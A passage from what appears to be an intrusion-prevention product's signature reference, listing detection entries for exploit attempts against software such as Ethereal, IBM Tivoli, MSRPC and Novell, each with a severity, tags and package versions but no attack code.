Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1091-5242
Vulnerability: NanoCore-RAT-C2-Traffic
Description:
Back to top

Generic_D-Link-Router-UPnP-Buffer-Overflow

About this situation: Detects buffer overflow exploits against D-Links routers
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2006, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-73-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: D-Link-Router-UPnP-Buffer-Overflow
Description:
Back to top

Generic_Darwin-Streaming-Server-Null-Byte-DoS

About this situation: Possible denial of service attack against Darwin Streaming Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Darwin Streaming Server, CVE2004, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-279-4219
Vulnerability: Darwin-Streaming-Server-Null-Byte
Description:
Back to top

Generic_Ethereal-AFP-Format-String

About this situation: Attempt to exploit format string vulnerability in Ethereal AFP dissector
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ethereal, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-448-4219
Vulnerability: Ethereal-AFP-Dissector-Format-String
Description:
Back to top

Generic_Ethereal-DistCC-BOF

About this situation: Attempt to exploit buffer overflow vulnerability in Ethereal DistCC dissector
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ethereal, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-26-1210
Last changed: sgpkg-ips-448-4219
Vulnerability: Ethereal-Multiple-Protocol-Dissector-Buffer-Overflows
Description:
Back to top

Generic_Ethereal-IAPP-BOF

About this situation: Attempt to exploit buffer overflow vulnerability in Ethereal IAPP dissector
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ethereal, CVE2005, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-26-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: UDP-Ethereal-IAPP-BOF
Description:
Back to top

Generic_Firebird-SQL-op-connect-request-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnrability in Firebird SQL detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Firebird Database Server, CVE2009, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-238-3038
Vulnerability: Firebird-SQL-op-connect-request-Denial-Of-Service
Description:
Back to top

Generic_FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service

About this situation: Detects denial of service exploits against the FreeBSD NFS daemon
Context: TCP Client Stream Unknown
Severity: 7
Tags: FreeBSD, Any Hardware, CVE2006, FreeBSD not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-559-5211
Vulnerability: FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service
Description:
Back to top

Generic_FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service-2

About this situation: Detects denial of service exploits against the FreeBSD NFS daemon
Context: TCP Client Stream Unknown
Severity: 2
Tags: FreeBSD, Any Hardware, CVE2006, FreeBSD not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-559-5211
Vulnerability: FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service
Description:
Back to top

Generic_Gld-Greylisting-Server-Buffer-Overflow-Remote-System-Compromise

About this situation: Attempt to exploit format string vulnerability in Gld greylisting server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Any Hardware, Gld, CVE2005, Unix not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-164-2032
Vulnerability: Gld-Greylisting-Server-Remote-System-Compromise
Description:
Back to top

Generic_Gld-Greylisting-Server-Format-String-Remote-System-Compromise

About this situation: Attempt to exploit format string vulnerability in Gld greylisting server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Any Hardware, Gld, CVE2005, Unix not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-164-2032
Vulnerability: Gld-Greylisting-Server-Remote-System-Compromise
Description:
Back to top

Generic_Gnu-Radius-SQL-Accounting-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Free Software Foundation GNU Radius detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, GNU Radius, CVE2006, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Gnu-Radius-SQL-Accounting-Format-String-Vulnerability
Description:
Back to top

Generic_GoodTech-Telnet-Administration-Web-Server-BOF

About this situation: Attempt to exploit a buffer overflow in GoodTech Telnet Server
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, x86, GoodTech Telnet Server, CVE2005, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: GoodTech-Telnet-Administration-Web-Server-BOF
Description:
Back to top

Generic_Google-Talk-Instant-Messaging-Network-Usage

About this situation: Google Talk instant messaging network usage detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Jabber Client, Any Operating System not specific, Instant Messaging, TCP Client Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-516-5211
Vulnerability: Google-Talk-Instant-Messaging-Network-Usage
Chrome-Remote-Desktop-Usage
Description:
Back to top

Generic_HP-OpenView-Omniback-II-System-Compromise

About this situation: Attempt to compromise HP OpenView Omniback II
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, HP OpenView OmniBack II, CVE2001, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HP-OpenView-Omniback-II-System-Compromise
Description:
Back to top

Generic_HTTP-MySQL-yaSSL-CertDecoder::GetName-Buffer-Overflow

About this situation: An attempt to exploit a MySQL yaSSL CertDecoder::GetName Buffer Overflow vulnerability detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, YaSSL, CVE2009, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1193-5242
Vulnerability: MySQL-yaSSL-CertDecoder::GetName-Buffer-Overflow
Description:
Back to top

Generic_IBM-DB2-Database-Server-Connect-Request-Denial-Of-Service

About this situation: Connect Request Denial of Service in IBM DB2 detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, IBM DB2, CVE2009, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-420-4219
Vulnerability: Generic_IBM-DB2-Database-Server-Connect-Request-Denial-Of-Service
Description:
Back to top

Generic_IBM-DB2-Database-Server-Invalid-Data-Stream-Denial-Of-Service

About this situation: An attempt to exploit an invalid data stream denial of service vulnerability in IBM DB2 detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM DB2, CVE2009, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-217-2032
Last changed: sgpkg-ips-217-2032
Vulnerability: Generic_IBM-DB2-Database-Server-Invalid-Data-Stream-Denial-Of-Service
Description:
Back to top

Generic_IBM-Tivoli-Storage-Manager-Agent-Buffer-Overflow

About this situation: Detect attacks exploiting IBM Tivoli Storage Manager Agent Buffer Overflow Vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, IBM Tivoli Storage Manager, CVE2008, Windows not specific, IBM Tivoli Storage Manager not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-269-3038
Vulnerability: IBM-Tivoli-Storage-Manager-Agent-Client-Generic-String-Handling-Buffer-Overflow
Description:
Back to top

Generic_IBM-Tivoli-Storage-Manager-Client-Dsmgent-Buffer-Overflow

About this situation: Detect attacks exploiting IBM Tivoli Storage Manager Agent Buffer Overflow Vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, IBM Tivoli Storage Manager, CVE2008, Windows not specific, IBM Tivoli Storage Manager not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-269-3038
Vulnerability: IBM-Tivoli-Storage-Manager-Client-dsmagent.exe-NodeName-Buffer-Overflow
Description:
Back to top

Generic_IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption

About this situation: Detect attacks exploiting IBM Tivoli Storage Manager Heap Corruption Vulnerability
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, IBM Tivoli Storage Manager, CVE2008, Windows not specific, IBM Tivoli Storage Manager not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-213-2032
Last changed: sgpkg-ips-1060-5242
Vulnerability: Generic-IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption
Description:
Back to top

Generic_IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption-2

About this situation: Detect attacks exploiting IBM Tivoli Storage Manager Heap Corruption Vulnerability
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, IBM Tivoli Storage Manager, CVE2008, Windows not specific, IBM Tivoli Storage Manager not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Generic-IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption
Description:
Back to top

Generic_IBM-Tivoli-Storage-Manager-Initial-Sign-On-Request-Buffer-Overflow

About this situation: Detects intial sign-on requests trying to exploit IBM Tivoli Storage Manager
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, IBM Tivoli Storage Manager, CVE2006, Windows not specific, IBM Tivoli Storage Manager not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-269-3038
Vulnerability: Generic-IBM-Tivoli-Storage-Manager-Initial-Sign-On-Request-Buffer-Overflow
Description:
Back to top

Generic_Ingres-Database-Uuid-From-Char-Stack-Buffer-Overflow

About this situation: Buffer overflow exploit against Ingres Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ingres Database, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Ingres-Database-Uuid-From-Char-Stack-Buffer-Overflow
Description:
Back to top

Generic_ISS-PAM-ICQ-BOF

About this situation: Attempt to exploit the ICQ parsing buffer overflow in ISS PAM
Context: UDP Packet Unknown
Severity: 10
Tags: Any Operating System, x86, ISS BlackICE, Proventia A/G/M, RealSecure, CVE2004, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: ISS-PAM-ICQ-Parsing-BOF
Description:
Back to top

Generic_ISS-PAM-ICQ-Parser-BOF

About this situation: Attempt to exploit the ICQ parsing buffer overflow in ISS PAM
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, ISS BlackICE, Proventia A/G/M, RealSecure, CVE2004, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1111-5242
Vulnerability: ISS-PAM-ICQ-Parsing-BOF
Description:
Back to top

Generic_ISS-PAM-ICQ-Parsing-BOF-1

About this situation: Attempt to exploit the ICQ parsing buffer overflow in ISS PAM
Context: UDP Packet Unknown
Severity: 10
Tags: Any Operating System, x86, ISS BlackICE, Proventia A/G/M, RealSecure, CVE2004, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-325-4219
Vulnerability: ISS-PAM-ICQ-Parsing-BOF
Description:
Back to top

Generic_ISS-PAM-ICQ-Parsing-BOF-2

About this situation: Attempt to exploit the ICQ parsing buffer overflow in ISS PAM
Context: UDP Packet Unknown
Severity: 10
Tags: Any Operating System, x86, ISS BlackICE, Proventia A/G/M, RealSecure, CVE2004, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: ISS-PAM-ICQ-Parsing-BOF
Description:
Back to top

Generic_ISS-PAM-ICQ-Parsing-BOF-3

About this situation: Attempt to exploit the ICQ parsing buffer overflow in ISS PAM
Context: UDP Packet Unknown
Severity: 10
Tags: Any Operating System, x86, ISS BlackICE, Proventia A/G/M, RealSecure, CVE2004, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: ISS-PAM-ICQ-Parsing-BOF
Description:
Back to top

Generic_ISS-PAM-ICQ-Parsing-BOF-Witty

About this situation: Attempt to exploit the ICQ parsing buffer overflow in ISS PAM
Context: UDP Packet Unknown
Severity: 10
Tags: Any Operating System, x86, ISS BlackICE, Proventia A/G/M, RealSecure, CVE2004, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: ISS-PAM-ICQ-Parsing-BOF
Description:
Back to top

Generic_Kame-Ike-Racoon-Hash

About this situation: An attempt to exploit a vulnerability in NetBSD Project NetBSD detected
Context: UDP Packet Unknown
Severity: 7
Tags: NetBSD, Any Hardware, CVE2004, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Kame-Ike-Racoon-Hash
Description:
Back to top

Generic_Kerberos-Authentication-Failed

About this situation: Failed Kerberos authentication detected
Context: TCP Server Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Failed Login, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-236-3038
Last changed: sgpkg-ips-448-4219
Vulnerability: Kerberos-Authentication-Failed
Description:
Back to top

Generic_LDAP-Ssl-Library-Malformed-Client-Hello-DoS

About this situation: Microsoft SSL library fails to handle malformed SSL Hello messages
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, IIS, MS2004, CVE2004, Windows not specific, IIS not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-420-4219
Vulnerability: SSLv3-Library-DoS
Description:
Back to top

Generic_Microsoft-Systems-Management-Server-DoS

About this situation: Microsoft System Management Server denial of service
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Microsoft Systems Management Server, CVE2004, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Systems-Management-Server-DoS
Description:
Back to top

Generic_Microsoft-Windows-DNS-Server-RPC-Management-Interface-Buffer-Overflow

About this situation: Buffer overflow exploit against Microsoft Windows Domain Name System Server services detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows 2003, Windows 2000 Server, Windows 2000 Advanced Server, Windows 2000 Datacenter Server, x86, MS2007-05, CVE2007, Windows 2003 not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-103-1314
Last changed: sgpkg-ips-278-4219
Vulnerability: Microsoft-Windows-DNS-Server-RPC-Management-Interface-Buffer-Overflow
Description:
Back to top

Generic_Microsoft-Windows-Exchange-Denial-Of-Service

About this situation: An attempt to cause Denial of Service in Microsoft Exchange Detected
Context: UDP Packet Unknown
Severity: 2
Tags: Windows XP, Windows 2000, Windows 2003, Windows 2008, Any Hardware, Exchange Server 2003, Exchange Server 2000, MS2009-02, CVE2009, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Denial of Service
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Windows-Exchange-System-Attendant-Denial-Of-Service
Description:
Back to top

Generic_mIRC-PRIVMSG-Message-Processing-Buffer-Overflow

About this situation: Buffer overflow exploit against mIRC detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, mIRC, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-173-2032
Vulnerability: mIRC-PRIVMSG-Message-Processing-Buffer-Overflow
Description:
Back to top

Generic_MIT-Kerberos-V5-KDC-Krb5_Unparse_Name-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in MIT Kerberos Project Kerberos detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2005, Any Operating System not specific, MIT Kerberos not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: MIT-Kerberos-V5-KDC-Krb5_Unparse_Name-Heap-Overflow
Description:
Back to top

Generic_Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow

About this situation: Buffer overflow exploit against Motorola Timbuktu Pro on tcp detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Motorola Timbuktu, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow
Description:
Back to top

Generic_MS-Messenger-PNG-Image-BOF-MS05-009

About this situation: Attempt to exploit a buffer overflow in MSN Messenger via malformed png
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MSN Messenger, MS2005-02, CVE2004, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-45-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: Libpng-Library-tRNS-sBIT-hIST-Chunk-Handling-BOF
Description:
Back to top

Generic_MSDTC-BuildContextW-Memory-Corruption

About this situation: Detects attacks against Microsoft Distributed Transaction Coordinator
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, x86, Microsoft Windows Distributed Transaction Coordinator, MS2005-10, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-41-1210
Last changed: sgpkg-ips-986-5242
Vulnerability: Generic-MSDTC-BuildContextW-Memory-Corruption
Description:
Back to top

Generic_MSDTC-BuildContextW-Memory-Corruption-2

About this situation: Detects attacks against Microsoft Distributed Transaction Coordinator
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, x86, Microsoft Windows Distributed Transaction Coordinator, MS2005-10, CVE2005, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-553-5211
Vulnerability: Generic-MSDTC-BuildContextW-Memory-Corruption
Description:
Back to top

Generic_MSRPC-CPS-Microsoft-Message-Queuing-Service-Queue-Name-Handling-Bind

About this situation: An attempt to bind into vulnerable interface in Microsoft Message Queue Service detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows 2000 SP4, Any Hardware, Microsoft Message Queuing, MS2008-10, CVE2008, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-725-5211
Vulnerability: Microsoft-Message-Queuing-Service-Queue-Name-Handling-Memory-Corruption
Description:
Back to top

Generic_MSRPC-CPS-MS-Host-Integration-Server-Vulnerable-Interface-Called

About this situation: A request to the vulnerable interface in Microsoft Host Integration Server detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Microsoft Host Integration Server, MS2008-10, CVE2008, Windows not specific, Microsoft Host Integration Server not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-725-5211
Vulnerability: Microsoft-Host-Integration-Server-Remote-Command-Execution-Vulnerability
Description:
Back to top

Generic_MSRPC-Messenger-BOF-MS03-043

About this situation: Windows Messenger Buffer Overflow (MS03-043)
Context: UDP Packet Unknown
Severity: 10
Tags: Windows, x86, Windows Messenger, MS2003, CVE2003, Windows not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: MS03-043
Description:
Back to top

Generic_MSRPC-Messenger-BOF-MS03-043-Breaking-Point

About this situation: Windows Messenger Buffer Overflow (MS03-043)
Context: UDP Packet Unknown
Severity: 10
Tags: Windows, x86, Windows Messenger, MS2003, CVE2003, Windows not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: MS03-043
Description:
Back to top

Generic_MSRPC-Windows-PnP-Buffer-Overflow

About this situation: Detects buffer overflow exploits against MSRPC WKSSVC interface
Context: UDP Packet Unknown
Severity: 10
Tags: Windows 2000, Windows XP SP1, x86, MS2005-08, CVE2005, Windows 2000 not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-PnP-Buffer-Overflow
Description:
Back to top

Generic_MSRPC-WKSSVC-MS03-049

About this situation: Detects buffer overflow exploits against MSRPC WKSSVC interface
Context: UDP Packet Unknown
Severity: 10
Tags: Windows XP, Windows 2000, x86, MS2003, CVE2003, Windows XP not specific, Windows 2000 not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: RPC-BOF-MS03-049
Description:
Back to top

Generic_MySQL-MaxDB-WebDBM-BOF

About this situation: Attempt to exploit buffer overflow vulnerability in MySQL MaxDB WebDBM service
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, x86, MySQL, CVE2004, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-160-2032
Vulnerability: TCP-MySQL-MaxDB-WebDBM-BOF
VBulletin-Arbitrary-Code-Execution
Proxy-Pro-Professional-GateKeeper-Buffer-Overflow
Description:
Back to top

Generic_Network-Block-Device-Server-Long-Request-Buffer-Overflow

About this situation: Detects large NBD client requests
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, NBD Server, CVE2005, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: NBD-Network-Block-Device-Server-Long-Request-Buffer-Overflow
Description:
Back to top

Generic_NgIRCd-Log-Resolver-Format-String-Vulnerability

About this situation: Attempt to exploit a format string vulnerability in ngIRCd
Context: TCP Server Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, ngIRCd, CVE2005, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: NgIRCd-Log-Resolver-Format-String-Vulnerability
Description:
Back to top

Generic_Novell-eDirectory-dhost-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in the handling of HTTP requests loading eDirectory modules in Novell eDirectory detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2009, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-436-4219
Vulnerability: Novell-eDirectory-dhost-Buffer-Overflow
Description:
Back to top

Generic_Novell-NetMail-NMAP-Stor-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the Novell Netmail detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell NetMail, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Novell-NetMail-NMAP-Stor-Command-Buffer-Overflow
Description:
Back to top

Generic_Novell-ZENworks-Pre-Authentication-Buffer-Overflow

About this situation: Exploit against buffer overflow vulnerability in Novell ZENworks
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, x86, Novell ZENworks Desktop/Server Management, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-36-1210
Last changed: sgpkg-ips-680-5211
Vulnerability: Novell-ZENworks-Pre-Authentication-Buffer-Overflow
Description:
Back to top

Generic_OpenBSD-ISAKMP-DOS

About this situation: An attempt to exploit a vulnerability in OpenBSD Project OpenBSD detected
Context: UDP Packet Unknown
Severity: 2
Tags: OpenBSD, Any Hardware, CVE2004, Potential Denial of Service
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: OpenBSD-ISAKMP-Multiple-Vulnerabilities
Description:
Back to top

Generic_OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
Description:
Back to top

Generic_OpenVMPS-Syslog-Format-String

About this situation: Detects a format string exploit against OpenVMPS
Context: TCP Client Stream Unknown
Severity: 10
Tags: Linux, Any Hardware, OpenVMPS, CVE2005, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: OpenVMPS-Syslog-Format-String
Description:
Back to top

Generic_Oracle-Bea-WebLogic-XSS

About this situation: Attempt to exploit XSS vulnerability in Oracle Bea WebLogic
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle BEA WebLogic, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-200-2032
Last changed: sgpkg-ips-200-2032
Vulnerability: Oracle-Bea-WebLogic-10-XSS
Description:
Back to top

Generic_Oracle-Database-DBMS-Assert-Filter-Bypass

About this situation: Detects SQL Injection attacks against the Oracle Database Server dbms_assert package
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2006, Any Operating System not specific, Oracle Database not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-DBMS-Assert-Filter-Bypass
Description:
Back to top

